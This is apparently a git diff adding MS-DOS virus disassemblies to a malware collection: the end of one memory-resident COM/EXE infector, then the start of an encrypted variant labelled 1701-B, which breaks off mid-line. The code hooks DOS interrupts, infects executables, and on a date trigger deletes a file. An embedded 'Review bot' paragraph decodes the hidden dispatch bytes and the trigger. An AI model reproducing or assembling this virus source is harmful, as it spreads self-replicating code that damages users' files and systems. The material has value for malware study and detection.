+ mov dx,bp + mov ax,di + push dx + push ax + add ax,4E2h + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + les di,dword ptr [si+2] ; Load 32 bit ptr + mov cs:data_24,di ; (701E:012B=0) + mov cs:data_25,es ; (701E:012D=0) + mov [si+2],dx + cmp dx,0 + je loc_21 ; Jump if equal + inc ax +loc_21: + mov [si+4],ax + pop ax + pop dx + call sub_2 + sub ax,[si+8] + les di,dword ptr [si+14h] ; Load 32 bit ptr + mov data_19,di ; (701E:0121=0C3C3h) + mov data_20,es ; (701E:0123=0C3C3h) + mov [si+14h],dx + mov [si+16h],ax + mov word ptr data_21,ax ; (701E:0125=0) + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + call sub_3 + jc loc_ret_22 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + mov ah,40h ; '@' + mov dx,si + mov cx,18h + call sub_5 + +loc_ret_22: + ret + +; External Entry into Subroutine + +sub_2: + mov cx,4 + mov di,ax + and di,0Fh + +locloop_23: + shr dx,1 ; Shift w/zeros fill + rcr ax,1 ; Rotate thru carry + loop locloop_23 ; Loop if cx > 0 + + mov dx,di + ret + +; External Entry into Subroutine + +sub_3: + mov ah,40h ; 
'@' + mov cx,4E2h + mov dx,100h + call sub_6 + jmp short loc_29 + db 90h + +; External Entry into Subroutine + +sub_4: + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp al,6 + je loc_24 ; Jump if equal + jnz loc_25 ; Jump if not zero +loc_24: + mov dx,10h + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,11Bh + mov cx,110Bh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + mov dx,2Eh + mov ax,3D02h + int 15h ; General services, ah=func 3Dh + mov ah,41h ; 'A' + int 21h ; DOS Services ah=function 41h + ; delete file, name @ ds:dx + jmp short loc_25 + db 90h +loc_25: + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + cmp ax,4E2h + jb loc_ret_28 ; Jump if below + cmp ax,0FA00h + jae loc_ret_28 ; Jump if above or = + push ax + cmp byte ptr [si],0E9h + jne loc_26 ; Jump if not equal + sub ax,4E5h + cmp ax,[si+1] + jne loc_26 ; Jump if not equal + pop ax + stc ; Set carry flag + ret +loc_26: + call sub_3 + jnc loc_27 ; Jump if carry=0 + pop ax + ret +loc_27: + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + pop ax + sub ax,3 + mov dx,121h + mov si,dx + mov byte ptr cs:[si],0E9h + mov cs:[si+1],ax + mov ah,40h ; '@' + mov cx,3 + call sub_5 + +loc_ret_28: + ret +sub_1 endp + + +; +; SUBROUTINE +; + +sub_5 proc near +loc_29: + pushf ; Push flags + call cs:data_26 ; (701E:012F=0) + ret +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push ax + push ds + push es + xor ax,ax ; Zero register + push ax + pop ds + cli ; Disable interrupts + les ax,dword ptr ds:data_5e ; (0000:0090=18Eh) Load 32 bit ptr + mov cs:data_27,ax ; (701E:0133=0) + mov cs:data_28,es ; (701E:0135=0) + mov ax,44Eh + mov ds:data_5e,ax ; (0000:0090=18Eh) + mov ds:data_6e,cs ; (0000:0092=1498h) + les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr + mov cs:data_30,ax ; (701E:013B=0) + mov 
cs:data_31,es ; (701E:013D=0) + les ax,cs:data_29 ; (701E:0137=0) Load 32 bit ptr + mov ds:data_1e,ax ; (0000:004C=831h) + mov ds:data_2e,es ; (0000:004E=70h) + sti ; Enable interrupts + pop es + pop ds + pop ax + ret +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push ax + push ds + push es + xor ax,ax ; Zero register + push ax + pop ds + cli ; Disable interrupts + les ax,dword ptr cs:data_27 ; (701E:0133=0) Load 32 bit ptr + mov ds:data_5e,ax ; (0000:0090=18Eh) + mov ds:data_6e,es ; (0000:0092=1498h) + les ax,dword ptr cs:data_30 ; (701E:013B=0) Load 32 bit ptr + mov ds:data_1e,ax ; (0000:004C=831h) + mov ds:data_2e,es ; (0000:004E=70h) + sti ; Enable interrupts + pop es + pop ds + pop ax + ret +sub_7 endp + + db 0B0h, 3, 0CFh + +; +; SUBROUTINE +; + +sub_8 proc near + mov dx,10h + mul dx ; dx:ax = reg * ax + ret +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + xor ax,ax ; Zero register + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor dx,dx ; Zero register + xor si,si ; Zero register + xor di,di ; Zero register + xor bp,bp ; Zero register + ret +sub_9 endp + + db 1Eh, 0E8h, 0, 0 + +; +; SUBROUTINE +; + +sub_10 proc near + mov ax,4B4Dh + nop + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + jc loc_30 ; Jump if carry Set + jmp loc_40 +loc_30: + pop si + push si + nop + mov di,si + xor ax,ax ; Zero register + push ax + pop ds + les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr + mov cs:data_39e[si],ax ; (701E:FCCD=0) + mov cs:data_40e[si],es ; (701E:FCCF=0) + les bx,dword ptr ds:data_3e ; (0000:0084=6E3h) Load 32 bit ptr + mov cs:data_37e[di],bx ; (701E:FCC5=0) + mov cs:data_38e[di],es ; (701E:FCC7=0) + mov ax,ds:data_7e ; (0000:0102=0CC00h) + cmp ax,0F000h + jne loc_38 ; Jump if not equal + mov dl,80h + mov ax,ds:data_8e ; (0000:0106=326h) + cmp ax,0F000h + je loc_31 ; Jump if equal + cmp ah,0C8h + jb loc_38 ; Jump if below + cmp ah,0F4h + jae loc_38 ; Jump if above or = + test al,7Fh + jnz 
loc_38 ; Jump if not zero + mov ds,ax + cmp word ptr ds:data_10e,0AA55h ; (0326:0000=6A7h) + jne loc_38 ; Jump if not equal + mov dl,ds:data_11e ; (0326:0002=70h) +loc_31: + mov ds,ax + xor dh,dh ; Zero register + mov cl,9 + shl dx,cl ; Shift w/zeros fill + mov cx,dx + xor si,si ; Zero register + +locloop_32: + lodsw ; String [si] to ax + cmp ax,0FA80h + jne loc_33 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7380h + je loc_34 ; Jump if equal + jnz loc_35 ; Jump if not zero +loc_33: + cmp ax,0C2F6h + jne loc_36 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7580h + jne loc_35 ; Jump if not equal +loc_34: + inc si + lodsw ; String [si] to ax + cmp ax,40CDh + je loc_37 ; Jump if equal + sub si,3 +loc_35: + dec si + dec si +loc_36: + dec si + loop locloop_32 ; Loop if cx > 0 + + jmp short loc_38 +loc_37: + sub si,7 + mov cs:data_39e[di],si ; (701E:FCCD=0) + mov cs:data_40e[di],ds ; (701E:FCCF=0) +loc_38: + mov ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + mov es,bx + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov bx,0FFFFh + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + sub bx,50h + nop + jc loc_40 ; Jump if carry Set + mov cx,es + stc ; Set carry flag + adc cx,bx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,4Fh + stc ; Set carry flag + sbb es:data_14e,bx ; (06E3:0002=2342h) + push es + mov es,cx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov ax,es + dec ax + mov ds,ax + mov word ptr ds:data_13e,8 ; (0692:0001=0D217h) + call sub_8 + mov bx,ax + mov cx,dx + pop ds + mov ax,ds + call sub_8 + add ax,ds:data_15e ; (06E3:0006=2344h) + adc dx,0 + sub ax,bx + sbb dx,cx + jc loc_39 ; Jump if carry Set + sub ds:data_15e,ax ; (06E3:0006=2344h) +loc_39: + mov si,di + xor di,di ; Zero register + push cs + pop 
ds + sub si,36Ah + mov cx,4E2h + inc cx + rep movsb ; Rep while cx>0 Mov [si] to es:[di] + mov ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + dec bx + mov ds,bx + mov byte ptr ds:data_12e,5Ah ; (0691:0000=0C9h) 'Z' + mov dx,173h + xor ax,ax ; Zero register + push ax + pop ds + mov ax,es + sub ax,10h + mov es,ax + cli ; Disable interrupts + mov ds:data_3e,dx ; (0000:0084=6E3h) + mov ds:data_4e,es ; (0000:0086=161Ah) + sti ; Enable interrupts + dec byte ptr ds:data_9e ; (0000:047B=0) +loc_40: + pop si + cmp word ptr cs:data_32e[si],5A4Dh ; (701E:FC99=0) + jne loc_41 ; Jump if not equal + pop ds + mov ax,cs:data_36e[si] ; (701E:FCBB=0) + mov bx,cs:data_35e[si] ; (701E:FCB9=0) + push cs + pop cx + sub cx,ax + add cx,bx + push cx + push word ptr cs:data_34e[si] ; (701E:FCB7=0) + push ds + pop es + call sub_9 + ret ; Return far +loc_41: + pop ax + mov ax,cs:data_32e[si] ; (701E:FC99=0) + mov cs:data_16,ax ; (701E:0100=63E9h) + mov ax,cs:data_33e[si] ; (701E:FC9B=0) + mov cs:data_17,ax ; (701E:0102=0C303h) + mov ax,100h + push ax + push cs + pop ds + push ds + pop es + call sub_9 + ret +sub_10 endp + + +code_seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1701-b.asm b/MSDOS/Virus.MSDOS.Unknown.1701-b.asm new file mode 100644 index 00000000..c302c84e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1701-b.asm 
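Review bot: The listing carries no header saying what this sample does, and its destructive trigger is easy to miss: in sub_1 the `cmp dh,4` / `cmp dl,0Fh` test (15 April) and in sub_4 the `cmp al,6` test (day-of-week 6 from ah=2Ah) both fall into a find-first using the `*.EXE` string at 11Bh followed by `mov ah,41h / int 21h` on the found name at 2Eh (DTA+1Eh with the DTA set to 10h), i.e. a matching file in the current directory is deleted when the date hits. The int 21h handler's dispatch is likewise hidden in the `db` run before loc_1 — decoded, `3D 4D 4B 75 09 55 8B EC 83 66 06 FE 5D CF` is an `ax=4B4Dh` are-you-there check that clears CF in the stacked flags, and `80 FC 4B 74 12 3D 00 3D 74 0D 3D 00 6C 75 05 80 FB 00 74 03` filters functions 4Bh, 3D00h and 6C00h (bl=0) into loc_2, which matches the `mov ax,4B4Dh / int 21h / jc loc_30` residency test in sub_10. The `int 15h` with `ax=3D02h` in loc_18 and loc_24 sits where an int 21h open would be expected and the "General services, ah=func 3Dh" comment is only the disassembler's guess, so I would mark that line as unresolved rather than let the comment stand; similarly the ROM scan at loc_31 for `0FA80h/7380h` or `0C2F6h/7580h` followed by `40CDh`, whose result is saved in data_39e/data_40e and swapped into vector 4Ch (int 13h) by sub_6 around each file write, looks like an attempt to reach the BIOS disk entry directly and deserves a hedged comment. I would add after `; Created: 4-Mar-91` a header such as `; LIVE SAMPLE: memory-resident COM/EXE infector; hooks int 21h (vector 84h) and int 24h (vector 90h, replaced by mov al,3/iret), swaps int 13h (vector 4Ch) during writes; trigger on 15 April / day-of-week 6 deletes a *.EXE in the current directory. Do not assemble or run outside an isolated VM.`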
@@ -0,0 +1,424 @@ + +PAGE 59,132 + +; +; +; 1701-B +; +; Created: 11-Feb-92 +; Passes: 5 Analysis Options on: none +; +; + +data_31e equ 27D1h ;* +data_36e equ 4CD6h ;* +data_39e equ 6950h ;* +data_45e equ 8848h ;* +data_50e equ 0BDF1h ;* +data_53e equ 0CBC7h ;* +data_56e equ 0EA36h ;* +data_59e equ 49F2h +data_60e equ 0B0E0h +data_61e equ 0BCF1h +data_62e equ 0EAEFh + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +1701-b proc far + +start: + jmp loc_3 + db 39 dup (0) +data_22 db 0 ; Data table (indexed access) + db 30 dup (0) + db 28 dup (0) +loc_3: + cli ; Disable interrupts + mov bp,sp + call sub_1 + +1701-b endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop bx + sub bx,131h + test cs:data_22[bx],1 + jz $+11h ; Jump if zero + lea si,[bx+14Dh] ; Load effective addr + mov sp,682h +loc_5: + xor [si],si + xor [si],sp + inc si + dec sp + jnz loc_5 ; Jump if not zero + db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h + db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh + db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h + db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh + db 0B7h,0DAh,0D0h,0C0h,0C2h,0C6h + db 0E6h,0C2h + +locloop_6: + mov si,dx + xchg dh,bh + db 60h,0D4h,0ABh, 69h, 96h,0EEh + db 0EEh,0E2h, 0Bh,0A0h,0EFh,0E2h + db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h + db 0F6h +loc_8: + db 0F2h,0F2h, 30h, 8Ch,0FEh, 8Bh + db 0FAh, 8Fh, 82h, 82h, 8Fh, 8Eh + db 0B9h, 45h,0F6h,0F6h,0F2h,0F2h + db 0EEh,0EEh,0E2h,0E3h, 1Bh, 16h + db 0C2h + db 0C2h,0CEh + db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h + db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h + db 92h,0C3h,0ECh, 47h, 49h,0A4h + db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh + db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h + db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h + db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh + db 03h, 77h, 14h,0B9h,0FEh, 46h + db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h + db 73h, 11h, 44h,0B7h, 97h,0E9h + db 94h,0F4h + db 19h,0F0h,0E9h,0DCh, 79h, 71h + db 0A0h,0F3h,0DCh, 31h, 61h, 90h + db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h + db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh + db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h + db 85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch + db 32h, 
49h,0FEh, 12h, 73h,0B3h + db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh + db 80h,0DEh,0DCh, 87h,0E6h, 77h + db 8Bh,0F6h,0DCh +loc_14: + into ; Int 4 on overflow + db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh + db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh + db 0BBh, 86h, 45h, 76h,0B5h,0C2h + db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h + db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh + db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h + db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h + db 0D4h, 30h,0F0h,0F2h,0F2h, 43h + db 25h,0D2h, 48h, 43h, 05h,0EAh + db 47h, 80h,0CBh,0A1h, 46h,0A6h + db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h + db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h + db 20h,0F5h, 79h, 01h + db 4Fh + db 57h,0F4h, 33h, 3Dh, 66h,0C4h +loc_16: + dec bx + dec cx + mov dl,0C0h + lahf ; Load ah from flags + add ax,7EDCh + jns loc_14 ; Jump if not sign + db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h + db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh + db 0BFh, 7Ch, 33h,0D0h + db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h + db 80h + db 86h, 82h,0D8h,0A8h, 02h,0FCh + db 0F3h +loc_19: + div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data + lock jmp $-211h +sub_1 endp + + db 6Bh, 51h,0C8h,0E3h, 51h,0EEh + db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h + db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h + db 92h + db 9 + db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h + db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h + db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h + db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h + db 11h,0BBh, 19h,0B9h, 87h, 07h + db 0CEh, 22h,0E7h,0FCh,0F2h, 46h + db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah + db 0E5h, 95h, 83h, 92h,0C8h, 63h + db 17h, 52h,0F5h, 87h,0ABh,0E8h + db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh + db 4Fh,0D8h,0F9h,0C3h,0E0h + db 42h + db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h + db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh + db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h + db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh +loc_22: + jl loc_19 ; Jump if < + hlt ; Halt processor + mov dl,6Ah ; 'j' + dec word ptr ds:data_56e[si] + out 1Eh,ax ; port 1Eh ??I/O Non-standard + jc loc_22 ; Jump if carry Set + mov dl,0C0h + dec bp + mov sp,0C8E3h + inc bp + and bl,0C0h + sub sp,si + xchg ax,si + div di ; ax,dx rem=dx:ax/reg + db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h + db 
0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h + db 7Eh,0F4h + db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh + db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh + db 0CFh,0F1h, 49h, 24h, 09h, 1Fh + db 65h, 0Ch, 8Eh,0F2h, 49h, 76h + db 16h, 28h,0FDh, 2Ch, 39h, 0Fh + db 4Dh, 58h,0A3h,0D8h, 36h,0F4h + db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh + db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h + db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch + db 94h, 95h, 93h,0C0h,0DCh,0ECh + db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah + db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah + db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h + db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh + db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h + db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h + db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh + db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h + db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh + db 0F0h,0B0h,0FDh, 07h,0F1h, 10h + db 0Bh,0E7h,0ECh, 61h, 85h + db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h + db 46h,0D0h, 23h,0C3h,0CCh, 67h + db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h + db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh + db 37h, 48h, 04h, 01h, 76h, 0Ch + db 2Bh, 88h, 37h,0BEh,0F3h,0CDh + db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h + db 0CCh, 66h,0D8h,0CCh,0E3h, 07h + db 9Bh,0FCh,0DCh + db 57h +loc_27: + mov bp,0F7F3h + xchg ax,di + aaa ; Ascii adjust + in al,dx ; port 0FEC0h ??I/O Non-standard + stc ; Set carry flag + db 0C0h,0E9h + db 0C3h,0B6h, 29h, 76h,0F2h,0B1h + db 0D8h, 33h,0E4h,0B5h,0EFh, 23h + db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh + db 0AFh,0EFh, 72h, 03h,0D6h, 00h + db 33h,0D5h,0FAh, 87h, 3Ah, 83h + db 0C5h,0B5h, 4Bh, 4Fh,0AFh + db 0FCh, 37h, 4Ah,0F4h + db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h + db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h + db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h + db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h + db 0E8h, 49h,0CCh, 83h,0CFh,0DCh + db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh + db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h + db 09h,0CFh, 7Eh + db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h + db 0DCh,0C3h, 23h, 70h, 13h, 28h + db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh + db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh + db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h + db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h + db 79h,0E4h, 8Dh,0CFh,0ECh, 49h + db 0C8h, 83h,0C3h, 0Fh,0EFh, 7Ah + db 0CCh, 3Fh,0D7h,0D8h, 
79h,0FCh + db 0AFh,0EFh, 14h, 23h,0E1h, 93h + db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h + db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h + db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h + db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh + db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh + db 0E8h +loc_33: + stc ; Set carry flag + mov cl,0B3h + mov sp,4BBEh + cmc ; Complement carry + db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h + db 49h, 85h, 38h,0D7h,0C5h, 89h + db 85h + db 2Ch, 05h,0AAh,0E7h,0F1h, 79h + db 0E5h,0B6h,0E5h, 22h, 96h,0E4h + db 11h, 00h, 69h, 2Ch,0B4h,0ABh + db 0A9h,0E9h, 35h,0ECh,0F4h, 58h + db 58h, 52h, 0Dh, 00h,0BEh, 43h + db 03h, 81h,0D6h, 4Ch, 94h,0F7h + db 48h, 9Eh,0F2h, 57h,0E6h,0E2h + db 1Eh, 15h, 43h,0BBh,0BDh,0B0h + db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h + db 78h, 08h, 38h,0E4h, 90h,0C7h + db 70h,0C2h,0C1h + db 0Ch + db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h + db 79h, 1Eh, 18h,0E4h,0B6h,0E7h + db 19h, 6Ch,0FCh,0B6h,0EFh, 86h + db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h + db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h + db 0F7h, 79h, 62h, 5Ah,0F3h, 82h + db 0Dh, 5Fh + db 09h,0B4h,0F1h,0BCh, 21h,0B1h + db 0E0h,0B0h,0B1h, 65h, 36h, 78h + db 34h, 00h,0D0h,0A0h,0F3h, 78h + db 0CEh,0C1h, 00h, 17h, 26h,0C1h + db 0C4h, 94h,0CFh, 79h, 0Ah, 00h + db 0F0h,0A6h,0F3h, 11h, 60h,0E4h + db 0BAh,0E7h, 92h,0F0h, 58h, 34h + db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h + db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh + db 0AEh, 03h, 76h,0F5h, 85h, 31h + db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h + db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh + db 0E3h, 0Ch, 10h,0ABh, 10h, 00h + db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h + db 0C0h,0E2h, 38h, 24h,0A3h, 96h + db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh + db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h + db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh + db 42h, 84h,0F0h,0CEh, 2Dh,0F9h + db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch + db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh + db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh + db 0E2h, 92h, 1Ch,0D1h +loc_37: + sub cx,[bx-7Eh] + db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h + db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh + db 03h,0F1h, 1Ch, 77h,0FDh,0F2h + db 01h, 07h,0DCh, 51h,0B2h,0EFh + db 21h,0ABh + db 0Dh, 08h + db 24h,0E4h + db 
0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h + db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h + db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h + db 49h,0C2h,0E7h, 41h,0F2h,0F4h + db 0BBh, 23h,0F2h,0BFh,0E1h, 66h + db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h + db 0A5h,0F7h, 46h,0FDh, 03h,0DEh + db 4Ah,0E4h, 94h,0C7h, 04h,0C4h + db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh + db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h + db 0D0h, 94h + db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h + db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh + db 0F5h + +locloop_40: + movsw ; Mov [si] to es:[di] +;* mov dx,offset loc_46 ;* + db 0BAh, 84h,0F0h + mov ax,ds:data_45e + cmpsb ; Cmp [si] to es:[di] + db 0F3h,0F7h, 56h,0A1h,0F3h, 10h + db 2Eh, 14h,0C4h,0B4h,0E7h, 41h + db 80h,0EFh, 4Fh, 96h,0F3h,0CDh + db 0F0h, 90h,0F3h,0B8h,0CDh, 63h + db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh + db 45h, 02h,0C1h, 09h,0B1h, 53h + db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh + db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h + db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch + db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh + db 88h,0DEh,0AEh,0A1h,0F3h, 42h + db 0F6h, 1Ah,0B0h, 10h, 64h, 12h + db 0Ah, 60h, 18h, 0Ah,0F3h, 11h + db 9Ch, 20h, 1Ah,0EAh, 09h, 80h + db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h + db 90h,0C3h, 48h,0C0h, 9Dh,0F3h + db 47h,0F6h, 08h, 34h,0C8h,0D8h + db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h + db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h + db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh + db 6Ah, 72h, 78h,0F0h,0BDh, 70h + db 48h,0C8h,0C4h,0A5h,0F7h, 85h + db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h + db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch + db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h + db 30h, 0Ch, 2Ah,0F0h, 38h, 60h + db 97h,0CFh, 30h, 34h, 72h,0D0h + db 0A1h,0F3h, 0Fh, 10h, 20h, 52h + db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h + db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch + db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh + db 0ECh,0A5h,0F5h, 09h, 58h,0F2h + db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h + db 06h, 69h, 1Ch,0A8h, 92h,0E1h + db 0Bh,0BFh, 11h, 16h, 93h,0D2h + db 0Ah, 14h, 93h, 0Dh,0E0h, 34h + db 0C4h, 91h,0C7h,0CBh,0B7h, 96h + db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h + db 0DCh, 11h,0E0h,0BCh,0E3h, 93h + db 0A3h,0FCh + +locloop_41: + in al,0E0h ; port 0E0h, Memory encode reg2 + 
db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h + db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h + db 60h,0A2h, 23h,0EEh, 8Fh,0CFh + db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h + db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h + db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh + db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah + db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh + db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh + db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h + db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh + db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h + db 20h,0FDh, 2Ch, 35h, 07h, 2Ch + db 0F4h, 08h, 59h,0F3h,0FAh, 82h + db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h + db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h + db 9Ch,0FFh, 85h,0F3h + +locloop_42: + jbe loc_45 ; Jump if below or = + clc ; Clear carry flag + mov sp,0ECC8h + inc dx + loopnz locloop_41 ; Loop if zf=0, cx>0 + + retn + db 35h, 94h + db 97h + db 0AAh +loc_45: + esc 4,[bx+di] ; coprocessor escape + esc 0,cl ; coprocessor escape + db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh + db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h + db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h + db 88h, 82h, 83h, 87h, 08h, 42h + db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h + db 0F7h, 4Bh, 57h,0E8h, 12h, 11h + db 46h, 59h,0C5h,0E2h, 5Ch,0CDh + db 